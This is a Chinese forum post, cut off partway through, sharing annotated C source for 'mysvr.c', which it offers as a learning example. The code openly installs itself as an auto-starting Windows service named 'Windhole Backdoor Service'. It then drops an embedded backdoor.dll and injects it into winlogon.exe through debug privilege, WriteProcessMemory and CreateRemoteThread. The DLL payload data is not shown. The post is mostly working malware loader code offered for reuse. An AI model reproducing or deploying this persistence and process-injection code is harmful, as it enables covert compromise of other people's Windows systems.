贴点别人的源码,不错的!有详细的注释
代码不全,这是涉及主要的部分!
里面有涉及普通常用且又重要的编程思路,所以贴出来啦!
自己是菜鸟,自己不懂藏着也没用,希望对你有用哦
/*---------------------------------------------------------------------
//mysvr.c
//Coder: sjdf
//E-mail: sjdf1@163.com
//Create date: 2002.8.11
//Last modify date: 2003.10.28
//Test platform: Win2000 Adv Server + sp4
---------------------------------------------------------------------*/
//Header
#include "bkdlldata.h"
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <psapi.h>
#include <winsvc.h>
//---------------------------------------------------------------------
//Global constant
char SERVICENAME[9] = "windhole";
const char DISPLAYNAME[33] = "Windhole Backdoor Service";
const char SRVFILENAME[13] = "windhole.exe";
const char BDRFILENAME[13] = "backdoor.dll";
const char DESTPROC[19] = "winlogon.exe";
//---------------------------------------------------------------------
//Glabal variable
SERVICE_STATUS MyServiceStatus;
SERVICE_STATUS_HANDLE MyServiceStatusHandle;
int WillStop = 0;
//---------------------------------------------------------------------
//Function declaration
int AddPrivilege(const char *Name);
void MyServiceStart (int argc, char *argv[]);
void MyServiceCtrlHandler (DWORD opcode);
DWORD MyWrokThread(void);
DWORD ProcessToPID(const char *InputProcessName);
//---------------------------------------------------------------------
//Function definition
int main(int argc,char *argv[])
{
//如果参数为“-service”就作为服务启动
if ((argc >= 2) && (!lstrcmp(argv[1],"-service")))
{
SERVICE_TABLE_ENTRY DispatchTable[] =
{
{SERVICENAME, (LPSERVICE_MAIN_FUNCTION)MyServiceStart},
{NULL, NULL}
};
if (!StartServiceCtrlDispatcher( DispatchTable))
{
return 1;
}
return 0;
}
//否则就自动安装服务
//复制自身到系统目录
char DestName[MAX_PATH + 1];
char NowName[MAX_PATH + 1];
ZeroMemory(DestName,MAX_PATH + 1);
ZeroMemory(NowName,MAX_PATH + 1);
if (!GetSystemDirectory(DestName,MAX_PATH))
{
printf("GetSystemDirectory() error = %d\nInstall failure!\n",GetLastError());
return 1;
}
lstrcat(DestName,"\\");
lstrcat(DestName,SRVFILENAME);
if (!GetModuleFileName(NULL,NowName,MAX_PATH))
{
printf("GetModuleFileName() error = %d\nInstall failure!\n",GetLastError());
return 1;
}
if (!CopyFile(NowName,DestName,0))
{
printf("CopyFile() error = %d\nInstall failure!\n",GetLastError());
return 1;
}
//安装服务
SC_HANDLE newService, scm;
//连接SCM
if (!(scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE)))
{
printf("OpenSCManager() error = %d\nInstall failure!\n",GetLastError());
return 1;
}
//当作为服务启动时加上“-service”参数
lstrcat(DestName," -service");
if (!(newService = CreateService(scm,
SERVICENAME,
DISPLAYNAME,
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_NORMAL,
DestName,
NULL, NULL, NULL, NULL, NULL)))
{
printf("CreateService() error = %d\nInstall failure!\n",GetLastError());
}
else
{
printf("Install success!\n");
char *pra[] = {"-service", "\0"};
if (!StartService(newService,1,(const char **)pra))
{
printf("StartService() error = %d\nStart service failure!\n",GetLastError());
}
else
{
printf("Start service Success!\n");
}
}
CloseServiceHandle(newService);
CloseServiceHandle(scm);
return 0;
}
//---------------------------------------------------------------------
DWORD MyWorkThread(void)
{
Sleep(4000);
FILE *fp;
if ((fp = fopen(BDRFILENAME,"wb")) == NULL)
{
WillStop = 1;
return 1;
}
fwrite(data1,sizeof(data1),1,fp);
fwrite(data2,sizeof(data2),1,fp);
fwrite(data3,sizeof(data3),1,fp);
fwrite(data4,sizeof(data4),1,fp);
fwrite(data5,sizeof(data5),1,fp);
fclose(fp);
char FullName[MAX_PATH + 1];
ZeroMemory(FullName,MAX_PATH + 1);
GetSystemDirectory(FullName,MAX_PATH);
lstrcat(FullName,"\\");
lstrcat(FullName,BDRFILENAME);
//如果是要打开系统进程,一定要先申请debug权限
AddPrivilege(SE_DEBUG_NAME);
HANDLE hRemoteProcess = NULL;
DWORD Pid = ProcessToPID(DESTPROC);
if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许远程创建线程
PROCESS_VM_OPERATION | //允许远程VM操作
PROCESS_VM_WRITE | //允许远程VM写
PROCESS_VM_READ, //允许远程VM读
0,
Pid)) == NULL)
{
WillStop = 1;
return 1;
}
char *pDllName = NULL;
if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess,
NULL,
lstrlen(FullName) + 1,
MEM_COMMIT,
PAGE_READWRITE)) == NULL)
{
CloseHandle(hRemoteProcess);
WillStop = 1;
return 1;
}
//使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间
if (WriteProcessMemory(hRemoteProcess,
pDllName,
FullName,
lstrlen(FullName),
NULL) == 0)
{
VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
CloseHandle(hRemoteProcess);
WillStop = 1;
return 1;
}
//计算LoadLibraryA的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = NULL;
if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)
{
VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
CloseHandle(hRemoteProcess);
WillStop = 1;
return 1;
}
DWORD ThreadId = 0;
CreateRemoteThread(hRemoteProcess, //被嵌入的远程进程
NULL,
0,
pfnStartAddr, //LoadLibraryA的入口地址
pDllName,
0,
&ThreadId);
CloseHandle(hRemoteProcess);
WillStop = 1;
return 0;
}
//---------------------------------------------------------------------
void MyServiceStart (int argc, char *argv[])
{
if (!(MyServiceStatusHandle = RegisterServiceCtrlHandler(SERVICENAME,(LPHANDLER_FUNCTION)MyServiceCtrlHandler)))
{
return;
}
MyServiceStatus.dwServiceType = SERVICE_WIN32;
MyServiceStatus.dwCurrentState = SERVICE_START_PENDING;
MyServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwServiceSpecificExitCode = 0;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
return;
}
DWORD Threadid;
// Initialization code goes here. Handle error condition
if (!CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)MyWorkThread,NULL, 0, &Threadid))
{
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
MyServiceStatus.dwWin32ExitCode = GetLastError();
MyServiceStatus.dwServiceSpecificExitCode = GetLastError();
SetServiceStatus(MyServiceStatusHandle, &MyServiceStatus);
return;
}
// Initialization complete - report running status.
MyServiceStatus.dwCurrentState = SERVICE_RUNNING;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
return;
}
while(WillStop == 0)
{
Sleep(200);
}
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);
return;
}
//---------------------------------------------------------------------
void MyServiceCtrlHandler (DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_PAUSE:
// Do whatever it takes to pause here.
MyServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
// Do whatever it takes to continue here.
MyServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
// Do whatever it takes to stop here.
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);
WillStop = 1;
return;
case SERVICE_CONTROL_INTERROGATE:
// Fall through to send current status. [1] [2] 下一页 |
